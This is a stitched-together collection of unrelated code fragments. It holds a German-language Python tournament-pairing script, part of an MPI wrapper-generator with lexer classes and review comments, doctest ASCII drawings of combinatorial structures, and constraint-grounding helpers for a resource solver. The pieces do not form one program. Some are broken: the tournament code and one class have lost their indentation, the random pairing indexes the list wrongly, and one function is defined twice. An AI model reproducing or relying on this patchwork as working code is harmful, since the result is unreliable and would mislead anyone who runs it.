ask = input("Es wird nun ein Spieler zufällig disqualifiziert\n Falls du das nicht willst schreibe (n) \nIn dem Fall wenn du n eingibst musst du entweder vor dem Neustart deine Spieleranzahl in eine gerade Zahl umwandeln oder das Liga System verwenden.")
if ask == "n" or ask == "N":
sys.exit(0)
else:
rdmn = random.randint(0,playeramount-1)
playerlist.pop(rdmn)
playeramount = playeramount - 1
loop = True
print(playerlist[0])
while loop:
if skip == False:
try:
tournament_schedule = int(input("Welchen Tunierplan möchtest du benutzen durchnumerriert nach der Ordnung der Textdatei(1), zufällig (2), manueller Plan (3)"))
except ValueError:
print("Dein Input leider keine ganze Zahl")
else:
tournament_schedule = 1
if tournament_schedule == 1:
loop = False
round1plan = {}
playeramount_half = int(playeramount / 2)
for i in range (1, playeramount_half + 1):
print(i)
if i ==1:
round1plan["group{0}".format(i)] = 0, 1
else:
x = i-1
x = x *2
round1plan["group{0}".format(i)] = x, x+1
print(round1plan)
print("Der Turierplan wird nach der Ordnung der Textdatei erstellt")
elif tournament_schedule == 2:
loop = False
round1plan = {}
playeramount_half = int(playeramount / 2)
check = []
player_order = []
for i in range (0,playeramount-1):
check.append(i)
print(check)
while len(check) != 0:
random_number = random.randint(0,playeramount-1)
try:
check.remove(random_number)
except:
continue
player_order.append(random_number)
print(player_order)
for i in range (0,playeramount_half):
x = i-1
x = x *2
round1plan["group{0}".format(i+1)] = player_order[x], player_order[x+1]
print("Der Turnierplan wurde zufällig erstellt")
print(round1plan)
| |
weak mpifcmb3_
#pragma weak MPIFCMB3__
#pragma weak mpifcmb3__
#pragma weak MPIFCMB4
#pragma weak mpifcmb4
#pragma weak MPIFCMB4_
#pragma weak mpifcmb4_
#pragma weak MPIFCMB4__
#pragma weak mpifcmb4__
/* Argonne Fortran MPI wrappers */
#pragma weak MPIR_F_MPI_BOTTOM
#pragma weak MPIR_F_MPI_IN_PLACE
#pragma weak MPI_F_MPI_BOTTOM
#pragma weak MPI_F_MPI_IN_PLACE
#endif
#if defined(MPICH_NAME) && (MPICH_NAME == 1) /* MPICH has no MPI_IN_PLACE */
#define BufferC2F(x) (IsBottom(x) ? MPI_BOTTOM : (x))
#else
#define BufferC2F(x) (IsBottom(x) ? MPI_BOTTOM : (IsInPlace(x) ? MPI_IN_PLACE : (x)))
#endif /* defined(MPICH_NAME) && (MPICH_NAME == 1) */
#else
#define BufferC2F(x) (x)
#endif /* defined(__GNUC__) || defined(__INTEL_COMPILER) || defined(__PGI) || defined(_CRAYC) */
'''
# C declarations emitted into the main wrapper file for the Fortran PMPI init
# entry points. As the string itself explains, under PIC they are declared
# weak so the init wrappers can detect which variant was actually linked.
wrapper_main_pmpi_init_decls ='''
#if (defined(PIC) || defined(__PIC__))
/* For shared libraries, declare these weak and figure out which one was linked
based on which init wrapper was called. See mpi_init wrappers. */
#pragma weak pmpi_init
#pragma weak PMPI_INIT
#pragma weak pmpi_init_
#pragma weak pmpi_init__
#pragma weak pmpi_init_thread
#pragma weak PMPI_INIT_THREAD
#pragma weak pmpi_init_thread_
#pragma weak pmpi_init_thread__
#endif /* PIC */
_EXTERN_C_ void pmpi_init(MPI_Fint *ierr);
_EXTERN_C_ void PMPI_INIT(MPI_Fint *ierr);
_EXTERN_C_ void pmpi_init_(MPI_Fint *ierr);
_EXTERN_C_ void pmpi_init__(MPI_Fint *ierr);
_EXTERN_C_ void pmpi_init_thread(MPI_Fint *required, MPI_Fint *provided, MPI_Fint *ierr);
_EXTERN_C_ void PMPI_INIT_THREAD(MPI_Fint *required, MPI_Fint *provided, MPI_Fint *ierr);
_EXTERN_C_ void pmpi_init_thread_(MPI_Fint *required, MPI_Fint *provided, MPI_Fint *ierr);
_EXTERN_C_ void pmpi_init_thread__(MPI_Fint *required, MPI_Fint *provided, MPI_Fint *ierr);
'''
# Declarations from the .w file to be repeated in every source file.
# None until the .w input has been read (see static_out, which writes it
# into each generated file when set).
declarations = None
# Macros used to suppress MPI deprecation warnings.
wrapper_diagnosics_macros = '''
/* Macros to enable and disable compiler warnings for deprecated functions.
* These macros will be used to silent warnings about deprecated MPI functions,
* as these should be wrapped, even if they are deprecated.
*
* Note: The macros support GCC and clang compilers only. For other compilers
* just add similar macros for your compiler.
*/
#ifndef WRAP_MPI_CALL_PREFIX
#if defined(__clang__)
#define WRAP_MPI_CALL_PREFIX \\
_Pragma("clang diagnostic push"); \\
_Pragma("clang diagnostic ignored \\"-Wdeprecated-declarations\\"");
#define WRAP_MPI_CALL_POSTFIX _Pragma("clang diagnostic pop");
#elif defined(__INTEL_COMPILER)
#define WRAP_MPI_CALL_PREFIX \\
_Pragma("warning push"); \\
_Pragma("warning(disable:1786)");
#define WRAP_MPI_CALL_POSTFIX _Pragma("warning pop")
#elif (defined(__GNUC__) && \\
((__GNUC__ == 4 && __GNUC_MINOR__ >= 6) || __GNUC__ > 4))
#define WRAP_MPI_CALL_PREFIX \\
_Pragma("GCC diagnostic push"); \\
_Pragma("GCC diagnostic ignored \\"-Wdeprecated-declarations\\"");
#define WRAP_MPI_CALL_POSTFIX _Pragma("GCC diagnostic pop");
#else
#define WRAP_MPI_CALL_PREFIX
#define WRAP_MPI_CALL_POSTFIX
#endif
#endif
'''
# Default modifiers for generated bindings
default_modifiers = ["_EXTERN_C_"]  # _EXTERN_C_ is #defined (or not) in wrapper_includes. See above.
# Set of MPI Handle types
mpi_handle_types = set(["MPI_Comm", "MPI_Errhandler", "MPI_File", "MPI_Group", "MPI_Info",
                        "MPI_Op", "MPI_Request", "MPI_Status", "MPI_Datatype", "MPI_Win" ])
# MPI Calls that have array parameters, and mappings from the array parameter
# positions to the position of the 'count' parameters that determine their size.
# (Both positions are 0-based argument indices.)
mpi_array_calls = {
    "MPI_Startall"           : { 1:0 },
    "MPI_Testall"            : { 1:0, 3:0 },
    "MPI_Testany"            : { 1:0 },
    "MPI_Testsome"           : { 1:0, 4:0 },
    "MPI_Type_create_struct" : { 3:0 },
    "MPI_Type_get_contents"  : { 6:1 },
    "MPI_Type_struct"        : { 3:0 },
    "MPI_Waitall"            : { 1:0, 2:0 },
    "MPI_Waitany"            : { 1:0 },
    "MPI_Waitsome"           : { 1:0, 4:0 }
}
# MPI Calls that have an array index output parameter (i.e. "int *index") and
# position of that 'index' parameter. Needs special casing when wrapping Fortran
# calls (arrays '1' indexed) to C (arrays '0' indexed). May also be MPI_UNDEFINED.
mpi_array_index_output_calls = {
    "MPI_Testany" : 2,
    "MPI_Waitany" : 2
}
# MPI Calls that have an array of array-indices as an output parameter (i.e.
# "int *array_of_indices") and mappings from the position of that 'array_of_indices'
# to the position of the output parameter that determines its size.
# Needs special casing when wrapping Fortran calls (arrays '1' indexed) to C
# (arrays '0' indexed).
mpi_array_index_array_output_calls = {
    "MPI_Testsome" : { 3:2 },
    "MPI_Waitsome" : { 3:2 }
}
def find_matching_paren(string, index, lparen='(', rparen=')'):
    """Find the closing paren corresponding to the open paren at <index>
    in <string>. Optionally, can provide other characters to match on.
    If found, returns the index of the matching parenthesis. If not found,
    returns -1.

    Raises:
        ValueError: if string[index] is not <lparen>.
    """
    if not string[index] == lparen:
        raise ValueError("Character at index %d is '%s'. Expected '%s'"
                         % (index, string[index], lparen))
    # BUGFIX: the original never advanced past a paren it had just counted,
    # so any *nested* lparen looped forever, and unbalanced input indexed
    # past the end of the string. Scan forward once, tracking nesting depth.
    count = 0
    for i in range(index, len(string)):
        ch = string[i]
        if ch == lparen:
            count += 1
        elif ch == rparen:
            count -= 1
            if count == 0:
                return i
    return -1
# NOTE(review): this is a verbatim duplicate of find_matching_paren defined
# just above (the later def silently shadows the earlier one) — consider
# deleting one copy. Fixed identically so behavior does not depend on which
# definition wins.
def find_matching_paren(string, index, lparen='(', rparen=')'):
    """Find the closing paren corresponding to the open paren at <index>
    in <string>. Optionally, can provide other characters to match on.
    If found, returns the index of the matching parenthesis. If not found,
    returns -1.

    Raises:
        ValueError: if string[index] is not <lparen>.
    """
    if not string[index] == lparen:
        raise ValueError("Character at index %d is '%s'. Expected '%s'"
                         % (index, string[index], lparen))
    # BUGFIX: the original never advanced past a paren it had just counted,
    # so any *nested* lparen looped forever, and unbalanced input indexed
    # past the end of the string. Scan forward once, tracking nesting depth.
    count = 0
    for i in range(index, len(string)):
        ch = string[i]
        if ch == lparen:
            count += 1
        elif ch == rparen:
            count -= 1
            if count == 0:
                return i
    return -1
def isindex(str):
    """True if a string is something we can index an array with."""
    # NOTE: parameter name shadows the builtin; kept for interface stability.
    try:
        int(str)
    except ValueError:
        return False
    return True
def once(function):
    """Call *function* only the first time; later calls are no-ops.

    A 'did_once' attribute is stamped onto the function as the marker.
    """
    if hasattr(function, "did_once"):
        return
    function()
    function.did_once = True
# Returns MPI_Blah_[f2c,c2f] prefix for a handle type. MPI_Datatype is a special case.
def conversion_prefix(handle_type):
    """Prefix used to build <prefix>_f2c/_c2f conversion call names."""
    return "MPI_Type" if handle_type == "MPI_Datatype" else handle_type
# Special join function for joining lines together. Puts "\n" at the end too.
def joinlines(list, sep="\n"):
    """Join *list* with *sep* and append one trailing *sep*; '' if empty."""
    # NOTE: parameter name shadows the builtin; kept for interface stability.
    return sep.join(list) + sep if list else ""
def static_out(function):
    """Return the cached output file handle for *function*, creating
    <static_dir>/<function>.c with the standard preamble on first use.

    NOTE(review): the handle is deliberately left open and cached in
    static_files so later passes can keep writing to it.
    """
    if function in static_files:
        return static_files[function]
    file = open(static_dir + '/' + function + '.c', "w")
    file.write(wrapper_includes)
    if output_fortran_wrappers:
        file.write(fortran_wrapper_includes)
    if declarations:
        file.write(declarations)
    if output_guards:
        file.write("extern int in_wrapper;\n")
    static_files[function] = file
    return file
# Possible types of Tokens in input.
LBRACE, RBRACE, TEXT, IDENTIFIER = range(4)

class Token:
    """A lexed token: its type code, raw text value, and source line number."""
    def __init__(self, type, value, line=0):
        self.type = type    # one of LBRACE/RBRACE/TEXT/IDENTIFIER
        self.value = value  # raw text of the token
        self.line = line    # line number where the token started
    def __str__(self):
        # Show newlines as literal '\n' so tokens print on one line.
        return "'%s'" % self.value.replace("\n", "\\n")
    def isa(self, type):
        """True when this token has type code *type*."""
        return self.type == type
class LineTrackingLexer(object):
    """Base class for lexers built on re.Scanner that stamps each produced
    token with the line number where it started."""
    def __init__(self, lexicon):
        self.line_no = -1  # -1 means "not currently lexing"
        self.scanner = re.Scanner(lexicon)
    def make_token(self, type, value):
        """Wrap *value* in a Token at the current line, then advance the
        line counter by the newlines the token consumed."""
        tok = Token(type, value, self.line_no)
        self.line_no += value.count("\n")
        return tok
    def lex(self, text):
        """Tokenize *text*; exits the process on unlexable input."""
        self.line_no = 0
        tokens, remainder = self.scanner.scan(text)
        if remainder:
            sys.stderr.write("Unlexable input:\n%s\n" % remainder)
            sys.exit(1)
        self.line_no = -1
        return tokens
class OuterRegionLexer(LineTrackingLexer):
    """Lexer for the outermost region of the input: splits it into '{{',
    '}}', and runs of plain text."""
    def __init__(self):
        super(OuterRegionLexer, self).__init__([
            (r'{{', self.lbrace),
            (r'}}', self.rbrace),
            (r'({(?!{)|}(?!})|[^{}])*', self.text)])
    def lbrace(self, scanner, token):
        return self.make_token(LBRACE, token)
    def rbrace(self, scanner, token):
        return self.make_token(RBRACE, token)
    def text(self, scanner, token):
        return self.make_token(TEXT, token)
class OuterCommentLexer(OuterRegionLexer):
    """Outer-region lexer that also matches C/C++ comments as plain text,
    so '{{'/'}}' inside comments are not treated as delimiters."""
    def __init__(self):
        # NOTE(review): super(OuterRegionLexer, self) deliberately skips
        # OuterRegionLexer.__init__ and calls LineTrackingLexer.__init__
        # directly, so this lexicon REPLACES (not extends) the parent's.
        super(OuterRegionLexer, self).__init__([
            (r'/\*(.|[\r\n])*?\*/', self.text),       # multiline comment
            (r'//(.|[\r\n])*?(?=[\r\n])', self.text), # single line comment
            (r'{{', self.lbrace),
            (r'}}', self.rbrace),
            (r'({(?!{)|}(?!})|/(?![/*])|[^{}/])*', self.text)])
class InnerLexer(OuterRegionLexer):
    """Lexer for the inside of a {{ ... }} macro region: yields identifiers
    (optionally quoted) and nested {{/}} delimiters; whitespace is dropped."""
    def __init__(self):
        # NOTE(review): super(OuterRegionLexer, self) deliberately skips
        # OuterRegionLexer.__init__ and calls LineTrackingLexer.__init__
        # directly, so this lexicon REPLACES (not extends) the parent's.
        super(OuterRegionLexer, self).__init__([
            (r'{{', self.lbrace),
            (r'}}', self.rbrace),
            (r'(["\'])?((?:(?!\1)[^\\]|\\.)*)\1', self.quoted_id),
            (r'([^\s]+)', self.identifier),
            (r'\s+', None)])
    def identifier(self, scanner, token): return self.make_token(IDENTIFIER, token)
    def quoted_id(self, scanner, token):
        # remove quotes from quoted ids. Note that ids and quoted ids are pretty much the same thing;
        # the quotes are just optional. You only need them if you need spaces in your expression.
        return self.make_token(IDENTIFIER, re.sub(r'^["\'](.*)["\']$', '\\1', token))
# Global current filename and function name for error msgs
# (set elsewhere while parsing; read by syntax_error below).
cur_filename = ""
cur_function = None

class WrapSyntaxError(Exception):
    """Simple Class for syntax errors raised by the wrapper generator (rather than python)"""
    pass
def syntax_error(msg):
    """Report *msg* to stderr with a filename/line prefix, then abort
    parsing by raising WrapSyntaxError."""
    # TODO: make line numbers actually work.
    location_line = "%s:%d: %s\n" % (cur_filename, 0, msg)
    sys.stderr.write(location_line)
    if cur_function:
        sys.stderr.write("  While handling %s.\n" % cur_function)
    raise WrapSyntaxError
################################################################################
# MPI Semantics:
# Classes in this section describe MPI declarations and types. These are used
# to parse the mpi.h header and to generate wrapper code.
################################################################################
class Scope:
""" This is the very basic class for scopes in the wrapper generator. Scopes
are hierarchical and support nesting. They contain string keys mapped
to either string values or to macro functions.
Scopes also keep track of the particular macro they correspond to (macro_name).
"""
def __init__(self, enclosing_scope=None):
self.map = {}
self.enclosing_scope = enclosing_scope
self.macro_name = None # For better debugging error messages
def __getitem__(self, key):
if key in self.map: return self.map[key]
elif self.enclosing_scope: return self.enclosing_scope[key]
else: raise KeyError(key + " is not in scope.")
def __contains__(self, key):
if key in self.map: return True
elif self.enclosing_scope: return key in self.enclosing_scope
else: return False
def __setitem__(self, key, value):
self.map[key] = value
def include(self, map):
"""Add entire contents of | |
# doctest: +NORMALIZE_WHITESPACE
★
/ ★
/ ★
/ ★
<BLANKLINE>
★
/ / ★
/ ★
<BLANKLINE>
/ ★
/ / ★
<BLANKLINE>
★
/ ★
/ / ★
<BLANKLINE>
★
/ / / ★
>>> print(next(representations)) # doctest: +NORMALIZE_WHITESPACE
★
/ ★
/ ★
/ ★
/ ★
<BLANKLINE>
★
/ / ★
/ ★
/ ★
<BLANKLINE>
/ ★
/ / ★
/ ★
<BLANKLINE>
/
/ ★
/ / ★
<BLANKLINE>
★
/ ★
/ / ★
/ ★
<BLANKLINE>
★
/ / / ★
/ ★
<BLANKLINE>
/ / ★
/ / ★
<BLANKLINE>
★
/ / ★
/ / ★
<BLANKLINE>
/ ★
/ / / ★
<BLANKLINE>
★
/ ★
/ ★
/ / ★
<BLANKLINE>
★
/ / ★
/ / ★
<BLANKLINE>
/ ★
/ / / ★
<BLANKLINE>
★
/ ★
/ / / ★
<BLANKLINE>
★
/ / / / ★
Ballots
=======
>>> rows, cols = 3, 25
>>> coor, number = coordinates(rows), numbering(rows)
>>> linears = recursive_structures((ballot_shapes, 'linear'), 1, (coor, number))
>>> representations = map(make_pretty((rows, cols),), linears)
>>> print(next(representations)) # doctest: +NORMALIZE_WHITESPACE
★
>>> print(next(representations)) # doctest: +NORMALIZE_WHITESPACE
●★★
>>> print(next(representations)) # doctest: +NORMALIZE_WHITESPACE
●●★★★
<BLANKLINE>
● ●★★
>>> print(next(representations)) # doctest: +NORMALIZE_WHITESPACE
●●●★★★★
<BLANKLINE>
●● ●★★★
<BLANKLINE>
●● ●★★
<BLANKLINE>
● ●●★★★
<BLANKLINE>
● ● ●★★
>>> print(next(representations)) # doctest: +NORMALIZE_WHITESPACE
●●●●★★★★★
<BLANKLINE>
●●● ●★★★★
<BLANKLINE>
●●● ●★★★
<BLANKLINE>
●●● ●★★
<BLANKLINE>
●● ●●★★★★
<BLANKLINE>
●● ● ●★★★
<BLANKLINE>
●● ● ●★★
<BLANKLINE>
●● ●●★★★
<BLANKLINE>
●● ● ●★★
<BLANKLINE>
● ●●●★★★★
<BLANKLINE>
● ●● ●★★★
<BLANKLINE>
● ●● ●★★
<BLANKLINE>
● ● ●●★★★
<BLANKLINE>
● ● ● ●★★
Balanced parens
===============
>>> rows, cols = 3, 32
>>> coor, number = coordinates(rows), numbering(rows)
>>> parens = recursive_structures((balanced_parens_shapes, 'parens'), 1, (coor, number))
>>> representations = map(make_pretty((rows, cols),), parens)
>>> print(next(representations)) # doctest: +NORMALIZE_WHITESPACE
★
>>> print(next(representations)) # doctest: +NORMALIZE_WHITESPACE
(★ ★
>>> print(next(representations)) # doctest: +NORMALIZE_WHITESPACE
((★ ★ ★
<BLANKLINE>
( (★ ★
>>> print(next(representations)) # doctest: +NORMALIZE_WHITESPACE
(((★ ★ ★ ★
<BLANKLINE>
(( (★ ★ ★
<BLANKLINE>
(( (★ ★
<BLANKLINE>
( ((★ ★ ★
<BLANKLINE>
( ( (★ ★
>>> print(next(representations)) # doctest: +NORMALIZE_WHITESPACE
((((★ ★ ★ ★ ★
<BLANKLINE>
((( (★ ★ ★ ★
<BLANKLINE>
((( (★ ★ ★
<BLANKLINE>
((( (★ ★
<BLANKLINE>
(( ((★ ★ ★ ★
<BLANKLINE>
(( ( (★ ★ ★
<BLANKLINE>
(( ( (★ ★
<BLANKLINE>
(( ((★ ★ ★
<BLANKLINE>
(( ( (★ ★
<BLANKLINE>
( (((★ ★ ★ ★
<BLANKLINE>
( (( (★ ★ ★
<BLANKLINE>
( (( (★ ★
<BLANKLINE>
( ( ((★ ★ ★
<BLANKLINE>
( ( ( (★ ★
Plane trees
===========
>>> rows, cols = 10, 25
>>> coor, number = coordinates(rows), numbering(rows)
>>> plane_trees = recursive_structures((plane_trees_shapes, 'plane'), 4, (coor, number))
>>> representations = map(make_pretty((rows, cols),), plane_trees)
>>> print(next(representations)) # doctest: +NORMALIZE_WHITESPACE
★
>>> print(next(representations)) # doctest: +NORMALIZE_WHITESPACE
★
Λ
★
>>> print(next(representations)) # doctest: +NORMALIZE_WHITESPACE
★
Λ
Λ★
★
<BLANKLINE>
Λ★
Λ
★
>>> print(next(representations)) # doctest: +NORMALIZE_WHITESPACE
★
Λ
Λ★
Λ★
★
<BLANKLINE>
Λ★
ΛΛ
★★
<BLANKLINE>
Λ
Λ★
Λ
★
<BLANKLINE>
★
ΛΛ
Λ★
★
<BLANKLINE>
Λ
Λ★
Λ
★
>>> print(next(representations)) # doctest: +NORMALIZE_WHITESPACE
★
Λ
Λ★
Λ★
Λ★
★
<BLANKLINE>
Λ★
ΛΛ
Λ★★
★
<BLANKLINE>
Λ
Λ★
ΛΛ
★★
<BLANKLINE>
Λ
Λ
Λ★
Λ
★
<BLANKLINE>
★
ΛΛ
ΛΛ★
★★
<BLANKLINE>
Λ
ΛΛ,★
Λ★
★
<BLANKLINE>
Λ
ΛΛ★
Λ
★
<BLANKLINE>
Λ★
ΛΛ
Λ★
★
<BLANKLINE>
Λ
Λ
Λ★
Λ
★
<BLANKLINE>
★
Λ
ΛΛ★
Λ★
★
<BLANKLINE>
ΛΛ★
ΛΛ
★★
<BLANKLINE>
ΛΛ
Λ★
Λ
★
<BLANKLINE>
Λ ★
ΛΛ
Λ★
★
<BLANKLINE>
Λ
Λ
Λ★
Λ
★
Triangulated polygons
=====================
>>> rows, cols = 8, 25
>>> coor, number = coordinates(rows), numbering(rows)
>>> triangulated = recursive_structures((triangulated_shapes, 'north'), rows*12+4, (coor, number))
>>> representations = map(make_pretty((rows, cols),), triangulated)
>>> print(next(representations)) # doctest: +NORMALIZE_WHITESPACE
★
>>> print(next(representations)) # doctest: +NORMALIZE_WHITESPACE
★▲★
>>> print(next(representations)) # doctest: +NORMALIZE_WHITESPACE
★
★▼▲★
<BLANKLINE>
★
▲▼★
>>> print(next(representations)) # doctest: +NORMALIZE_WHITESPACE
★
★▲▼▲★
★
<BLANKLINE>
★▲★
▼▲★
<BLANKLINE>
★
▼▲▼★
<BLANKLINE>
★▲★
▲▼★
<BLANKLINE>
▲▼▲★
★
>>> print(next(representations)) # doctest: +NORMALIZE_WHITESPACE
★ ★
★▼▲▼▲★
★
<BLANKLINE>
★
▲▼▲★
★▼★
<BLANKLINE>
★▲★
▲▼▲★
<BLANKLINE>
★
▲▼▲▼★
<BLANKLINE>
★
★▼▲★
▼▲★
<BLANKLINE>
★
▲▼★
▼▲★
<BLANKLINE>
▲ ★
▼▲▼★
<BLANKLINE>
★▲★
▼▲▼★
<BLANKLINE>
▼▲▼▲★
★
<BLANKLINE>
★
★▼▲★
▲▼★
<BLANKLINE>
★
▲▼★
▲▼★
<BLANKLINE>
▲
▲▼▲★
★
<BLANKLINE>
▲▼▲★
★▼★
<BLANKLINE>
★
▲▼▲▼★
Blocks
======
>>> rows, cols = 10, 25
>>> coor, number = coordinates(rows), numbering(rows)
>>> blocks = recursive_structures((blocks_shapes, 'block'), 4, (coor, number))
>>> representations = map(make_pretty((rows, cols), joiner=' '), blocks)
>>> print(next(representations)) # doctest: +NORMALIZE_WHITESPACE
★
>>> print(next(representations)) # doctest: +NORMALIZE_WHITESPACE
★
▢ ★
>>> print(next(representations)) # doctest: +NORMALIZE_WHITESPACE
★
▢ ★
▢ ★
<BLANKLINE>
★
▢ ▢ ★
>>> print(next(representations)) # doctest: +NORMALIZE_WHITESPACE
★
▢ ★
▢ ★
▢ ★
<BLANKLINE>
★
▢ ▢ ★
▢ ★
<BLANKLINE>
▢ ★
▢ ▢ ★
<BLANKLINE>
★
▢ ★
▢ ▢ ★
<BLANKLINE>
★
▢ ▢ ▢ ★
>>> print(next(representations)) # doctest: +NORMALIZE_WHITESPACE
★
▢ ★
▢ ★
▢ ★
▢ ★
<BLANKLINE>
★
▢ ▢ ★
▢ ★
▢ ★
<BLANKLINE>
▢ ★
▢ ▢ ★
▢ ★
<BLANKLINE>
▢
▢ ★
▢ ▢ ★
<BLANKLINE>
★
▢ ★
▢ ▢ ★
▢ ★
<BLANKLINE>
▢ ▢,★ ★
▢ ▢ ★
<BLANKLINE>
★
▢ ▢ ▢ ★
▢
<BLANKLINE>
★
▢ ▢ ★
▢ ▢ ★
<BLANKLINE>
▢ ★
▢ ▢ ▢ ★
<BLANKLINE>
★
▢ ★
▢ ★
▢ ▢ ★
<BLANKLINE>
★
▢ ▢ ★
▢ ▢ ★
<BLANKLINE>
▢ ★
▢ ▢ ▢ ★
<BLANKLINE>
★
▢ ★
▢ ▢ ▢ ★
<BLANKLINE>
★
▢ ▢ ▢ ▢ ★
Rabbits
=======
>>> rows, cols = 8, 25
>>> coor, number = coordinates(rows), numbering(rows)
>>> rabbits = recursive_structures((rabbits_shapes, 'young'), 4, (coor, number))
>>> representations = map(make_pretty((rows, cols), joiner=''), rabbits)
>>> print(next(representations)) # doctest: +NORMALIZE_WHITESPACE
★
>>> print(next(representations)) # doctest: +NORMALIZE_WHITESPACE
★
○
>>> print(next(representations)) # doctest: +NORMALIZE_WHITESPACE
●▲
○ ★
>>> print(next(representations)) # doctest: +NORMALIZE_WHITESPACE
★
●○
○ ★
<BLANKLINE>
●
○ ●▲
★
>>> print(next(representations)) # doctest: +NORMALIZE_WHITESPACE
★
●○
○ ●▲
★
<BLANKLINE>
●▲
●○ ★
○
<BLANKLINE>
● ★
○ ●○
★
<BLANKLINE>
●
○ ●
●▲
★
>>> print(next(representations)) # doctest: +NORMALIZE_WHITESPACE
●▲
●○ ★
○ ●▲
★
<BLANKLINE>
●○ ★
○ ●○
★
<BLANKLINE>
●○
○ ●
●▲
★
<BLANKLINE>
★
●○
●○ ★
○
<BLANKLINE>
●
●○ ●▲
○ ★
<BLANKLINE>
● ★
○ ●○
●▲
★
<BLANKLINE>
● ●▲
○ ●○ ★
<BLANKLINE>
●
○ ● ★
●○
★
<BLANKLINE>
●
○ ●
●
●▲
★
Steep parallelograms
====================
>>> rows, cols = 14, 25
>>> coor, number = coordinates(rows), numbering(rows)
>>> steep_parallelograms = recursive_structures((steep_shapes, 'one_star'), 7, (coor, number))
>>> representations = map(make_pretty((rows, cols), joiner=' '), steep_parallelograms)
>>> print(next(representations)) # doctest: +NORMALIZE_WHITESPACE
★
>>> print(next(representations)) # doctest: +NORMALIZE_WHITESPACE
☆
▢
>>> print(next(representations)) # doctest: +NORMALIZE_WHITESPACE
☆
▢ ★
▢
>>> print(next(representations)) # doctest: +NORMALIZE_WHITESPACE
☆
▢ ★
▢ ★
▢
<BLANKLINE>
☆
▢ ▢
▢
>>> print(next(representations)) # doctest: +NORMALIZE_WHITESPACE
☆
▢ ★
▢ ★
▢ ★
▢
<BLANKLINE>
☆
▢ ▢
▢ ★
▢
<BLANKLINE>
▢ ☆
▢ ▢
▢
<BLANKLINE>
☆
▢ ★
▢ ▢
▢
>>> print(next(representations)) # doctest: +NORMALIZE_WHITESPACE
☆
▢ ★
▢ ★
▢ ★
▢ ★
▢
<BLANKLINE>
☆
▢ ▢
▢ ★
▢ ★
▢
<BLANKLINE>
▢ ☆
▢ ▢
▢ ★
▢
<BLANKLINE>
▢
▢ ☆
▢ ▢
▢
<BLANKLINE>
☆
▢ ★
▢ ▢
▢ ★
▢
<BLANKLINE>
▢ ▢,☆
▢ ▢
▢
<BLANKLINE>
☆
▢ ▢ ★
▢ ▢
▢
<BLANKLINE>
☆
▢ ★
▢ ★
▢ ▢
▢
<BLANKLINE>
☆
▢ ▢
▢ ▢
▢
Sigmoids
========
>>> rows, cols = 9, 25
| |
elif isinstance(desc[key], dict) and 'constraint__' in desc[key]: # This is a constraint
res.append([(1, path + [key], desc[key])])
elif isinstance(desc[key], dict):
res += walk_props_for_constraints(desc[key], path + [key])
elif key != "name" or path != "": # Add an equality constraint for a value, except the object name
res.append([(1, path + [key], desc[key])])
return res
def grounded_clause(constraint_clause, resource):
    """Ground each prop of *constraint_clause* against *resource*.

    The clause is a list of unbounded variables to be bound to the resource
    (ultimately to other constraint vars too). For efficiency, also checks
    truth and skips any constraint_var in the clause that cannot be true.
    If none can be true then generate_clauses turns this into the unary
    clause saying the resource cannot match. It might be more efficient
    never to generate this match variable, but it's only a unary clause.
    """
    grounded = []
    for prop in constraint_clause:
        candidate = grounded_prop(prop, resource)
        if candidate is not False and candidate != []:
            grounded.append(candidate)
    return grounded
def grounded_prop(triple, resource, indent=""):
    """Ground one (truth, path, value) constraint triple against *resource*.

    Returns True/False for constraints decidable right away, a list of
    grounded alternatives for a '?' (choice) constraint, and 1 as a
    placeholder for a plain (non-constraint) value.
    NOTE(review): unsupported constraint kinds only print diagnostics and
    fall through, implicitly returning None ("Will crash" below) — confirm
    whether callers tolerate that.
    """
    (truth, path, value) = triple
    # NOTE(review): s is only used by the commented-out debug print below.
    s = short_ids(resource)
    #print indent+'need to ground', (truth, path, value), '\n '+indent+'with', follow_path(path, s['props'])
    props = resource['props']
    if isinstance(value, dict) and 'constraint__' in value:
        if value['constraint__'] == '?':  # choice: succeed if ANY sub-value grounds
            res = []
            for sub_value in value['value__']:
                grounded = grounded_prop((truth, path, sub_value), resource, indent + "  ")
                if grounded is True:
                    # One alternative is definitely true -> whole choice is true.
                    return True
                elif grounded is not False and grounded != []:
                    res.append(grounded)
            return res
        elif value['constraint__'] == '[]':  # One of a list
            res_vals = follow_path(path, props)
            return isinstance(res_vals, list) and value['value__'] in res_vals
        elif value['constraint__'] in ['>=', '>', '<', '<=']:
            # Numeric comparison against the resource's value at `path`.
            res_val = follow_path(path, props)
            #print 'here', value, res_val
            if value['constraint__'] == '>=':
                return res_val >= value['value__']  # brittle right now
            elif value['constraint__'] == '>':
                return res_val > value['value__']  # brittle right now
            if value['constraint__'] == '<=':
                return res_val <= value['value__']  # brittle right now
            elif value['constraint__'] == '<':
                return res_val < value['value__']  # brittle right now
        else:
            #print 'not currently translating the constraint:', value, 'on', props
            print("not currently translating the constraint:")
            print(value)
            #print(on)
            print(props)
            # Will crash
    else:
        # Plain value: placeholder truth weight for an equality variable.
        return 1
# Walk a key path through nested dicts. Returns None if the path is absent.
def follow_path(path, d):
    """Return the value reached by following *path* through *d*, else None."""
    current = d
    for key in path:
        if key not in current:
            return None
        current = current[key]
    return current
# Recursively walk a resource dict given a constraint path and value. Returns +1
# when the resource satisfies the constraint and -1 otherwise. Doesn't yet handle
# an 'image' list of possible images.
def walk_resource_for_truth(d, path, value):
    """Return 1 if *d* satisfies path == value (or a '|>=' lower bound), else -1."""
    if not path or path[0] not in d:
        return -1
    head = path[0]
    if len(path) == 1:
        found = d[head]
        if found == value:
            return 1
        # '|>=' encodes a numeric lower bound; other operators still needed.
        # NOTE(review): value[3:-1] drops the final character — this appears to
        # expect a trailing delimiter such as '|>=5|'; confirm the string format.
        if isinstance(value, str) and value.startswith('|>='):
            return 1 if found >= float(value[3:-1]) else -1
        return -1
    if isinstance(d[head], dict):
        return walk_resource_for_truth(d[head], path[1:], value)
    return -1
# Define a variable stating that this resource satisfies this constraint.
def resource_constraint_var(resource, path, value):
    # NOTE(review): the dict branch only logs and implicitly returns None —
    # callers presumably never pass nested constraint dicts here; confirm.
    if isinstance(value, dict):
        #print 'dict is', value
        print("dict is %s" % value)
    else:
        # NOTE(review): ``resource['id'] + path`` assumes path is a string here,
        # but elsewhere paths are lists of keys (which would raise TypeError) —
        # verify the call sites. Returns the (var_number, already_existed) pair
        # from find_or_add_var.
        return find_or_add_var(resource['id'] + path, value) # Equality variable
def link_ok(n1, n2, link_props, id_link_map, node_site_map):
    """Decide whether two request nodes can be connected given the site topology.

    Currently stubbed out: the unconditional ``return True`` below makes
